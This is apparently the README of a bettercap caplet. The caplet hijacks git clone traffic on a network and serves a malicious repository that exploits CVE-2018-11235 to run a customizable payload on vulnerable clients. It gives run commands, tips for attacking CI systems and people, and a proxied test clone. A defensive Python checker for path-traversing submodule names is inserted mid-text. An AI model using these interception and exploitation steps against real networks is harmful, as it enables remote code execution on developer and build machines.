This caplet intercepts http/https git clone attempts and redirects them to a local http server that serves a malicious repository, leading to exploitation of CVE-2018-11235 on a vulnerable client.

- Create a malicious repository with the `build_repo.sh` script. The script will take the contents of `payload.txt` as payload - customize the payload file to your needs.
- Run the caplet with:
  `bettercap -caplet caplets/gitspoof/gitspoof.cap`
You can control to which repository the victim is redirected by changing the
`gitspoof.repo` variable to an IP or domain (do not prefix it with
http(s)). This way, if the victim is not susceptible to CVE-2018-11235,
you can still try to inject arbitrary code into the repo - this might
come in handy when trying to exploit some bad CI/deployment scripts.
Obviously the script won't be able to intercept https git clones
unless you can obtain a valid SSL cert or the victim used the `-c http.sslVerify=false`
configuration option.
The script was aimed at attacking automated systems, not people, therefore the repo layout doesn't try hard to look inconspicuous ;)
Attacking a human with this caplet would also require spoofing some trusted domain and pointing it at the bettercap server, since Git will always notify the user about an http redirect.
Finally - all the CVE-2018-11235 limitations apply - to get RCE the victim needs to have a vulnerable git client and do a recursive git clone (or initialize the submodules afterwards).
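As a defender-side counterpart to the limitation above: the upstream fix for CVE-2018-11235 rejects submodule names containing a `..` path component, because such a name lets a checkout write outside `.git/modules/`. The following is an added example, not part of this caplet, that applies the same check to a `.gitmodules` file (for instance in a CI step before `git submodule update`); the sample file and the `example.invalid` URLs are constructed.

```python
import re

# Constructed sample .gitmodules: one benign submodule and one whose *name*
# (not its path) escapes .git/modules/ via ".." components.
SAMPLE_GITMODULES = """\
[submodule "libs/helper"]
\tpath = libs/helper
\turl = https://example.invalid/helper.git
[submodule "../../modules/evil"]
\tpath = evil
\turl = https://example.invalid/evil.git
"""

# [submodule "name"] section header; the name may contain escaped quotes.
SECTION_RE = re.compile(r'^\s*\[submodule\s+"((?:[^"\\]|\\.)*)"\]\s*$')
# key = value lines inside a section (git allows letters, digits and '-').
KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')


def parse_gitmodules(text):
    """Return {name: {key: value}} for each [submodule "name"] section."""
    modules, current = {}, None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current = modules.setdefault(m.group(1), {})
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(2)
    return modules


def is_unsafe_submodule_name(name):
    """True if the name is empty or has a '..' component (either separator),
    i.e. it could resolve to a directory outside .git/modules/."""
    return not name or any(p == ".." for p in re.split(r"[\\/]+", name))


def find_unsafe_submodules(text):
    """Sorted list of submodule names that fail the traversal check."""
    return sorted(n for n in parse_gitmodules(text) if is_unsafe_submodule_name(n))


if __name__ == "__main__":
    print("unsafe submodule names:", find_unsafe_submodules(SAMPLE_GITMODULES))
    # prints ['../../modules/evil']
```

Run it against a freshly cloned repository's `.gitmodules` before initializing submodules; a non-empty result means the clone should not be trusted, even on a patched client.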
You can test the script yourself without ARP poisoning:

- Set up a vulnerable git on your system.
- Fire the caplet (remember to run `./build_repo.sh` first!).
- On the vulnerable system run:
  `http_proxy=<ip address of bettercap machine>:<bettercap_http_port> git clone --recursive http://github.com/bettercap/bettercap /tmp/exploit`
  (NOTE: we are intentionally trying to clone via http on github)

The clone should trigger the default payload.